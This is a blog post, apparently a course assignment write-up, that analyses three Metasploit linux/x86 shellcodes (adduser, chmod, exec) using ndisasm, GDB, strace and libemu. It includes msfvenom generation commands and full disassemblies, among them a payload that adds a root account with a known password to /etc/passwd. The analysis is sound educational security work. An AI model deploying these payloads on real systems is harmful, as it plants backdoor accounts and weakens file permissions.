<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>SLAE32 | Jeremy Catelain</title>
<meta name="generator" content="Jekyll v3.9.2" />
<meta property="og:title" content="SLAE32" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Description of the assignment Take up at least 3 shellcode samples created using Msfpayload for linux/x86 Use GDB/NDisasm/Libemu to dissect the functionality of the shellcode Present your analysis We are going to analyse together the following shellcodes: linux/x86/adduser linux/x86/exec linux/x86/chmod" />
<meta property="og:description" content="Description of the assignment Take up at least 3 shellcode samples created using Msfpayload for linux/x86 Use GDB/NDisasm/Libemu to dissect the functionality of the shellcode Present your analysis We are going to analyse together the following shellcodes: linux/x86/adduser linux/x86/exec linux/x86/chmod" />
<link rel="canonical" href="http://localhost:4000/slae32/2022/10/05/Assign5-Msfpayload.html" />
<meta property="og:url" content="http://localhost:4000/slae32/2022/10/05/Assign5-Msfpayload.html" />
<meta property="og:site_name" content="Jeremy Catelain" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-10-05T08:45:58+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="SLAE32" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-10-05T08:45:58+02:00","datePublished":"2022-10-05T08:45:58+02:00","description":"Description of the assignment Take up at least 3 shellcode samples created using Msfpayload for linux/x86 Use GDB/NDisasm/Libemu to dissect the functionality of the shellcode Present your analysis We are going to analyse together the following shellcodes: linux/x86/adduser linux/x86/exec linux/x86/chmod","headline":"SLAE32","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/slae32/2022/10/05/Assign5-Msfpayload.html"},"url":"http://localhost:4000/slae32/2022/10/05/Assign5-Msfpayload.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Jeremy Catelain" /></head>
<body><header class="site-header" role="banner">

    <div class="wrapper"><div class="align-left">
            <div class="image-cropper"><img src="/images/photo-profil-2.jpg" alt="photo de profil" class="rounded" /></div>
            <div class="align-left2">
                <a class="site-title" rel="author" href="/">Jeremy Catelain </a><div class="site-job">Cybersecurity Consultant</div></div>
        </div><nav class="site-nav">
            <input type="checkbox" id="nav-trigger" class="nav-trigger" />
            <label for="nav-trigger">
                <span class="menu-icon">
                    <svg viewBox="0 0 18 15" width="18px" height="15px">
                        <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
                    </svg>
                </span>
            </label>

            <div class="trigger"><a class="page-link" href="/categories/2022-09-14-categories.html">CATEGORIES</a><a class="page-link" href="/">Home</a><a class="page-link" href="/about/">ABOUT</a></div>
        </nav></div>
</header>
<main class="page-content" aria-label="Content">

        <div class="wrapper">
                <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

        <header class="post-header">
            <div class="post-header-about">
                <h1 class="post-list-heading2 p-name" itemprop="name headline">SLAE32</h1>
                <h1 class="post-list-heading3 p-name" itemprop="name headline">|  Assignment 5 - Msfpayload</h1>
            </div>
            <p class="post-meta-title">
                <time class="dt-published" datetime="2022-10-05T08:45:58+02:00" itemprop="datePublished">Oct 5, 2022
                </time></p><div class="github-link">
                <a class="github-link-post" href="https://github.com/jeremycatelain/SLAE32-Assignments/tree/main/assignment5"> Github repository </a>
            </div></header>

        <div class="post-content e-content" itemprop="articleBody">
            <h3 id="-description-of-the-assignment-"><span style="color:#2d8fb3;"> Description of the assignment </span></h3>

<ul>
  <li>Take up at least 3 shellcode samples created using Msfpayload for linux/x86</li>
  <li>Use GDB/NDisasm/Libemu to dissect the functionality of the shellcode</li>
  <li>Present your analysis</li>
</ul>

<p>We are going to analyse together the following shellcodes:</p>
<ul>
  <li>linux/x86/adduser</li>
  <li>linux/x86/exec</li>
  <li>linux/x86/chmod</li>
</ul>

<!--more-->

<h3 id="-part-1---linuxx86adduser-shellcode-"><span style="color:#2d8fb3;"> Part 1 - linux/x86/adduser shellcode </span></h3>

<h4 id="-principle-"><span style="color:#01416C;"> Principle </span></h4>

<p>This first shellcode creates a user named ‘metasploit’ with the password ‘metasploit’.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>metasploit:metasploit
</code></pre></div></div>

<p>To analyse the shellcode we use ndisasm to display the instructions as follows :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/adduser R | ndisasm -u -
</code></pre></div></div>

<p><strong>Code result :</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80 // setreuid
00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx
00000021  B504              mov ch,0x4
00000023  CD80              int 0x80 // Open
00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80 //
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80 //
</code></pre></div></div>

<h4 id="-execution-of-the-shellcode-"><span style="color:#01416C;"> Execution of the shellcode </span></h4>

<p>The first thing we will try is to exploit the executable to see the result:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.1.PNG" alt="drawing" style="width:900px;" /></p>

<p><strong><em>Note: Be careful with unknown shellcodes.</em></strong></p>

<p>And when we search into the /etc/passwd file, we can see that the user has been well added as we can see:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh
</code></pre></div></div>

<p>Then we will look into more details about this shellcode.</p>

<h4 id="-1---setreuid-"><span style="color:#01416C;"> 1 - setreuid </span></h4>

<p>The first instructions passed are as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    00000000  31C9              xor ecx,ecx
    00000002  89CB              mov ebx,ecx
    00000004  6A46              push byte +0x46
    00000006  58                pop eax
    00000007  CD80              int 0x80
</code></pre></div></div>

<p><img src="/assets/slae32-img/assignment5/assignment5.8.PNG" alt="drawing" style="width:900px;" /></p>

<p>And the registers passed to that syscall are:</p>
<ul>
  <li>EAX = 0x46 which is 70 in decimal</li>
  <li>EBX = 0</li>
  <li>ECX = 0</li>
  <li>EDX = 0</li>
  <li>ESI = 0</li>
  <li>EDI = 0</li>
</ul>

<p>So when we look at the syscall number 70 into “/usr/include/x86_64-linux-gnu/asm/unistd_32.h” and we get the setreuid syscall:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/adduser# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 70
#define __NR_setreuid 70
</code></pre></div></div>

<p><strong>Details of the syscall:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setreuid - set real and/or effective user ID
int setreguid(uid_t ruid, uid_t euid);
</code></pre></div></div>

<p>The analysis shows a setruid call with a real and effective user ID set to 0. By doing that, a privilege elevation is performed. Indeed, it changes the user ID of the user who launch the shellcode to 0 which corresponds to the root user ID.</p>

<h4 id="--2---open-"><span style="color:#01416C;">  2 - Open </span></h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373 // dwss
00000014  682F2F7061        push dword 0x61702f2f // ap//
00000019  682F657463        push dword 0x6374652f // cte/
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx
00000021  B504              mov ch,0x4
00000023  CD80              int 0x80
</code></pre></div></div>

<p><img src="/assets/slae32-img/assignment5/assignment5.9.PNG" alt="drawing" style="width:900px" /></p>

<p>The registers passed to that syscall are:</p>
<ul>
  <li>EAX = 0x5 (Open syscall)</li>
  <li>EBX = /etc//passwd</li>
  <li>ECX = 0x401</li>
  <li>EDX = 0</li>
  <li>ESI = 0</li>
  <li>EDI = 0</li>
</ul>

<p>So when look at the syscall number 5 we get the setreuid call :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define __NR_open 5
</code></pre></div></div>

<p>Syscall details:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>open - open and possibly create a file
int open(const char *pathname, int flags)
</code></pre></div></div>

<p><strong>EBX - Explanation</strong></p>

<p>If we look at the push performed and then move into the EBX register, we can see that the values as follows are pushed:</p>

<p>push dword 0x64777373 // dwss
push dword 0x61702f2f // ap//
push dword 0x6374652f // cte/</p>

<p>Because of the little endian, the values are inversed but if we put them in the other way, it becomes “/etc//passwd”. 
And with the push ECX performed before, the value of EBX becomes /etc//passwd0x00.</p>

<p><strong>ECX - Explanation:</strong></p>

<p><strong><em>Technic 1</em></strong></p>

<p>The easiest way to find the flags parameters passed to the ECX registers is to use the tool strace.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/adduser# strace ./adduser 2&gt;&amp;1 | grep open
open("/etc//passwd", O_WRONLY|O_APPEND) = 3
</code></pre></div></div>

<p>It displays the paramters O_WRONLY and O_APPEND have been passed to the open function.</p>

<p><strong><em>Technic 2</em></strong></p>

<p>The second technic is by looking at the value 0x401 passed to ECX.
If we try to convert the value in decimal, it gives 2001 as we can see:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/chmod# printf "%o\n" 0x401
2001
</code></pre></div></div>

<p>To find the corresponding flags, we have to look into the /usr/include/asm-generic/fcntl.h file and as we can see it confirms that the flag values are:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define O_WRONLY	00000001 
#define O_APPEND	00002000
</code></pre></div></div>

<p>For the first one, the detail in the man 2 open page shows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The argument flags must include one of the following access modes: O_RDONLY, O_WRONLY, or O_RDWR. 
These request opening the file read-only, write-only, or read/write, respectively.
</code></pre></div></div>

<p>And for the second one, the details in the man 2 open page shows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>O_APPEND
    The  file  is  opened in append mode.  Before each write(2), the file offset is posi‐
    tioned at the end of the file, as if with lseek(2).  The  modification  of  the  file
    offset and the write operation are performed as a single atomic step.
</code></pre></div></div>

<p>So, by specifying the O_WRONLY and the O_APPEND flags, the file permissions set are respectively the write only and the writing of the data at the end of the file.</p>

<h4 id="--3---jmp-call-pop-"><span style="color:#01416C;">  3 - JMP-CALL-POP </span></h4>

<p>In the instruction section, we can see the following instructions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
</code></pre></div></div>

<p>So to better understand the behavior, we look at it into GDB which gave the following instructions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048079:	xchg   ebx,eax
0x804807a:	call   0x80480a7
0x80480a7:	pop    ecx
</code></pre></div></div>

<p>The first instruction store the file descriptor into EAX. Then, as we could see into GDB, the JMP-CALL-POP technic is used to retrive the address of the string that needs to be inserted into the /etc/passwd file. The last instruction store the address of the following value :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ECX: 0x804807f ("metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\nY\213Q\374j\004X̀j\001X̀")
</code></pre></div></div>

<h4 id="-4---write-"><span style="color:#01416C;"> 4 - Write </span></h4>

<p>Then in GDB, we display the newt instructions :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x80480a8:	mov    edx,DWORD PTR [ecx-0x4] // Length
0x80480ab:	push   0x4
0x80480ad:	pop    eax
0x80480ae:	int    0x80
</code></pre></div></div>

<p><img src="/assets/slae32-img/assignment5/assignment5.7.PNG" alt="drawing" style="width:900px" /></p>

<p>As we can see the register values are:</p>
<ul>
  <li>EAX = 0x4 // Write Syscall</li>
  <li>EBX = 0x3 // File descriptor</li>
  <li>ECX = 0x804807f // Address of the values to write</li>
  <li>EDX = 0x28 // 40 in decimal</li>
  <li>ESI = 0</li>
  <li>EDI = 0</li>
</ul>

<p>So when we look at the syscall number 4 into “/usr/include/x86_64-linux-gnu/asm/unistd_32.h” and we get the write syscall:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/adduser# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 4
#define __NR_write 4
</code></pre></div></div>

<p>man 2 write result:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssize_t write(int fd, const void *buf, size_t count);
</code></pre></div></div>

<p>So, this syscall write in the /etc/passwd file the string ‘metasploit:Az/dIsj4p4IRc:0:0:: /:/bin/sh\n’’ with a length of 40.</p>

<h4 id="-5---exit-"><span style="color:#01416C;"> 5 - Exit </span></h4>

<p>GDB displayed the final instructions as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x80480b0:	push   0x1
0x80480b2:	pop    eax
0x80480b3:	int    0x80
</code></pre></div></div>

<p><img src="/assets/slae32-img/assignment5/assignment5.10.PNG" alt="drawing" style="width:900px" /></p>

<p>As we can see the register values are:</p>
<ul>
  <li>EAX = 0x1 // Exit Syscall</li>
  <li>EBX = 0x3 // File descriptor</li>
</ul>

<p>So, we look into the unistd_32.h file to find the corresponding syscall and it seems that is is an Exit syscall.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/adduser# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 1
#define __NR_exit 1_
</code></pre></div></div>

<p>Result : 
The final instruction perform an Exit syscall and it let a random value for the status parameter.</p>

<h3 id="-part-2---linuxx86chmod-shellcode-"><span style="color:#2d8fb3;"> Part 2 - linux/x86/chmod shellcode </span></h3>

<h4 id="-principle--1"><span style="color:#01416C;"> Principle </span></h4>

<p>This linux/x86/chmod shellcode runs a chmod command on a specified file with specified mode.</p>

<p>To analyze the shellcode purpose, the file “restrictedfile” is created with the specifications as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/chmod# ls -l /etc/restrictedfile 
-rw-r--r-- 1 root root 0 févr. 16 20:44 /etc/restrictedfile
</code></pre></div></div>

<p>The rights attributed to the file are initially 0644 and in this exercise, we are going to analyse a shellcode which change them to 0777.</p>

<p>To make sure that the shellcode works, we created it shellcode and executed it:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.11.PNG" alt="drawing" style="width:900px" /></p>

<p>As we can see, the rights on the file have been changed successfully.</p>

<h4 id="-analysis-"><span style="color:#01416C;"> Analysis </span></h4>

<p>To analyse the shellcode we can use several technics.
First, we can use directly GDB to go step by step and stop (break) at each syscall and look at the register’s values.</p>

<p>Then, we can used the libemu/tools/sctest script to analyse it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/chmod R | /opt/hackingtools/libemu/tools/sctest/sctest -vvv -Ss 100000
        -S : read shellcode from stdin
        -s : how much of the shellcode we would like to run (100000 =&gt; to have all the shellcode executed)
</code></pre></div></div>

<p>And, we used the graphical option to help to visualize it:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/chmod FILE=/etc/restrictedfile MODE=0777 R | /opt/hackingtools/libemu/tools/sctest/sctest -vvv -Ss 100000 -G chmod.dot
//Then convert into PNG file :
dot chmod.dot -Tpng -o chmod.png
</code></pre></div></div>

<p>Finally, we can display the instruction with the following command line:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/chmod FILE=/etc/restrictedfile MODE=0777 R | ndisasm -u -
</code></pre></div></div>

<p>In this assessment, we will use all of those technic to be more accurate on the actions performed.</p>

<p>Shellcode instructions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048054:	cdq    
0x8048055:	push   0xf
0x8048057:	pop    eax
0x8048058:	push   edx
0x8048059:	call   0x8048072
0x804805e:	das    
0x804805f:	gs je  0x80480c5
0x8048062:	das    
0x8048063:	jb     0x80480ca
0x8048065:	jae    0x80480db
0x8048067:	jb     0x80480d2
0x8048069:	arpl   WORD PTR [ebp+eiz*2+0x64],si
0x804806d:	imul   bp,WORD PTR [ebp+eiz*2+0x0],0x685b
0x8048074:	inc    DWORD PTR [ecx]
0x8048076:	add    BYTE PTR [eax],al
0x8048078:	pop    ecx
0x8048079:	int    0x80
0x804807b:	push   0x1
0x804807d:	pop    eax
0x804807e:	int    0x80
</code></pre></div></div>

<h4 id="-1---chmod-"><span style="color:#01416C;"> 1 - CHMOD </span></h4>

<p>The first instruction are as follows :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048054:	cdq    
0x8048055:	push   0xf // decimal value = 15
0x8048057:	pop    eax
</code></pre></div></div>

<p>As we can see, the hexadecimal value 0xf (15 in decimal) is poped into the EAX register. We searched for the syscall associated to the decimal value 15 and we found that it corresponds to the chmod syscall.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/chmod# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 15
#define __NR_chmod 15
</code></pre></div></div>

<p>Syscall details:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chmod - change permissions of a file
int chmod(const char *pathname, mode_t mode);    
</code></pre></div></div>

<p>We can see that the chmod function is constituted as follows:</p>
<ul>
  <li>*pathname: Pointer pointing to the string of the targeted file pathname;</li>
  <li>mode: Mode to apply to the file.</li>
</ul>

<p>The technic of the jump call pop is used to retrive the address of the string “/etc/restricted” as we can see:</p>

<p>Call instruction:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.13.PNG" alt="drawing" style="width:900px" /></p>

<p>Pop Instruction:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.14.PNG" alt="drawing" style="width:900px" /></p>

<p>Address of the string “/etc/restricted” strored into the register EBX:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.15.PNG" alt="drawing" style="width:900px" /></p>

<p>Then the next step is to set up the second parameter “mode”. 
The next instructions showed by GDB are as follows:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.16.PNG" alt="drawing" style="width:900px" /></p>

<p>As we can see, it pop into the ECX register the value “0x1ff” which correspond to the decimal value 777 that we specified in an option of our shellcode.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/chmod# printf "%o\n" 0x1ff
777
</code></pre></div></div>

<p>Then, at the syscall instruction (0x80), it gives the following state:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.17.PNG" alt="drawing" style="width:900px" /></p>

<p>With the registers:</p>
<ul>
  <li>EAX = 0xf // decimal value 15 for the chmod syscall</li>
  <li>EBX = 0x804805e (“/etc/restrictedfile”) // address of the string of the file</li>
  <li>ECX = 0x1ff // decimal value 777 for the mode</li>
</ul>

<h6 id="exit">Exit</h6>

<p>Finally the last instructions are as follows:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.18.PNG" alt="drawing" style="width:900px" /></p>

<p>We can see that the value 0x1 is passed to the EAX register. 
By looking at the corresponding sycall in the unistd_32.h file, we find out that it corresponds to the exit syscall.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/PentesterAcademy/SLAE32-Exam/assignment5/chmod# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 1
#define __NR_exit 1
</code></pre></div></div>

<p>Details of the Exit syscall:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_exit, terminate the calling process
#include &lt;unistd.h&gt;
void _exit(int status);
</code></pre></div></div>

<p>Finally, we can see in the last instruction that only the EAX register has been changed because the status parameter required is only used to return a state to the parent process which is not required in our case.</p>

<h3 id="-part-3---linuxx86exec-shellcode-"><span style="color:#2d8fb3;"> Part 3 - linux/x86/exec shellcode </span></h3>

<h4 id="-principle--2"><span style="color:#01416C;"> Principle </span></h4>

<p>This linux/x86/exec shellcode execute an arbirary command line.</p>

<p>To find out how the shellcode works and reacts we first performed a test with the following the steps:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.21.PNG" alt="drawing" style="width:900px" /></p>

<p>As we can see, an ls command as been specified to the shellcode and successfully executed when launch.</p>

<p>Now we are will go deeper and find out which syscalls are performed.</p>

<h4 id="-shellcode-analysis-"><span style="color:#01416C;"> Shellcode Analysis </span></h4>

<p>To analyse this shellcode we can use several technics.
First, we can use directly GDB to go step by step an stop at each syscall and looking at the register’s values.</p>

<p>We can used as well the libemu/tools/sctest script to analyse it :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/exec CMD=ls R | /opt/hackingtools/libemu/tools/sctest/sctest -vvv -Ss 100000
    -S : read shellcode from stdin
    -s : how much of the shellcode we would like to run (100000 =&gt; to have all the shellcode executed)
</code></pre></div></div>

<p>And used the graphical option to help to visualize it :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/exec CMD=ls R | /opt/hackingtools/libemu/tools/sctest/sctest -vvv -Ss 100000 -G exec.dot
//Then convert into PNG file :
dot exec.dot -Tpng -o exec.png
</code></pre></div></div>

<p>Result:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.22.PNG" alt="drawing" style="width:900px" /></p>

<p>Finally, we can display the instruction with the following command line:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfvenom -p linux/x86/exec CMD=ls R | ndisasm -u -
</code></pre></div></div>

<p>In this assessment, we will use all of those technic to be more specific about the actions performed.</p>

<p>Shellcode instructions:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048054:	push   0xb
0x8048056:	pop    eax
0x8048057:	cdq    
0x8048058:	push   edx
0x8048059:	pushw  0x632d
0x804805d:	mov    edi,esp
0x804805f:	push   0x68732f
0x8048064:	push   0x6e69622f
0x8048069:	mov    ebx,esp
0x804806b:	push   edx
0x804806c:	call   0x8048074
0x8048071:	ins    BYTE PTR es:[edi],dx
0x8048072:	jae    0x8048074
0x8048074:	push   edi
0x8048075:	push   ebx
0x8048076:	mov    ecx,esp
0x8048078:	int    0x80
</code></pre></div></div>

<p>The first two instructions set the value of eax to 0xb.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048054:	push   0xb
0x8048056:	pop    eax
</code></pre></div></div>

<p>0xb in hexadecimal is equivalent to 11 in decimal.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/exec# printf "%d\n" 0xb
11
</code></pre></div></div>

<p>We search what syscall corresponds to the decimal value 11 in the unistd_32.h file and it appears that it is the execve syscall.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/exec# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep 11
#define __NR_execve 11
</code></pre></div></div>

<p>Details of the execve syscall:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>execve - execute program
int execve(const char *pathname, char *const argv[], char *const envp[]);
</code></pre></div></div>

<p>So, the arguments of the exceve syscall as follows needs to be defined:</p>
<ul>
  <li>Pathname: Pointer pointing to the string of the path to the executable;</li>
  <li>Argv[]: Array of pointers pointing to the command-line strings;</li>
  <li>envp[]: Array of pointers pointing to the environment strings of the new program (usually NULL).</li>
</ul>

<p>The next instructions are:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x8048058:	push   edx
0x8048059:	pushw  0x632d
0x804805d:	mov    edi,esp
</code></pre></div></div>

<p>It set the value 0x632d to the registers EDI.</p>

<p>We mapped the value 0x632d to the ASCII table and inversed the value because of the little indian indentation and we find out that the EDI register is set to “-c”.</p>

<p>Then, two pushs are performed on the stack and the address is then set to the register EBX.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x804805f:	push   0x68732f =&gt; /sh
0x8048064:	push   0x6e69622f =&gt; /bin
0x8048069:	mov    ebx,esp
</code></pre></div></div>

<p>Then, we mapped the values to the ASCII table and inversed the values because of the little indian indentation and we deducted that the address of the string “/bin/sh” has been set into the EBX register.</p>

<p>Then, the following instruction are used to retrieve the command line that we want to launch.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x804806b:	push   edx
0x804806c:	call   0x8048074
0x8048071:	ins    BYTE PTR es:[edi],dx
0x8048072:	jae    0x8048074
0x8048074:	push   edi
0x8048075:	push   ebx
0x8048076:	mov    ecx,esp
</code></pre></div></div>

<p>The call instruction performed put on the stack the address of the ls string, then the edi’s value “-c” is pushed on the stack as well as the /bin/sh and finally the ESP address containing the argument “/bin/sh -c ls” is pushed into the ECX register.</p>

<p>To conclude, as follows the state of the Execve syscall:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.24.PNG" alt="drawing" style="width:900px" /></p>

<p>SO, we can see that:</p>
<ul>
  <li>The EAX register contains the decimal value 11 related to the Execve syscall;</li>
  <li>The EBX register contains the address of the string pathname /bin/sh;</li>
  <li>The ECX register contains the arguments “/bin/sh -c ls”;</li>
  <li>The EDX value is set to NULL.</li>
</ul>

<p>And, when the syscall is performed, the “ls” command line is executed:</p>

<p><img src="/assets/slae32-img/assignment5/assignment5.25.PNG" alt="drawing" style="width:900px" /></p>


        </div>


        <!--<a class="u-url" href="/slae32/2022/10/05/Assign5-Msfpayload.html" hidden></a>
          -->
    </article>

        </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

      <!--<h2 class="footer-heading">Jeremy Catelain</h2> -->

    <div class="Github-link"></div>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <!--<ul class="contact-list">
          <li class="p-name">Jeremy Catelain</li>
        </ul> -->
      </div>


      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a class="social-media-listed" href="https://github.com/jeremycatelain"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">jeremycatelain</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
          <p>COPYRIGHT 2022 JEREMY CATELAIN - ALL RIGHTS RESERVED.</p>
      </div>
  </div>

  </div>

</footer>
</body>

</html>
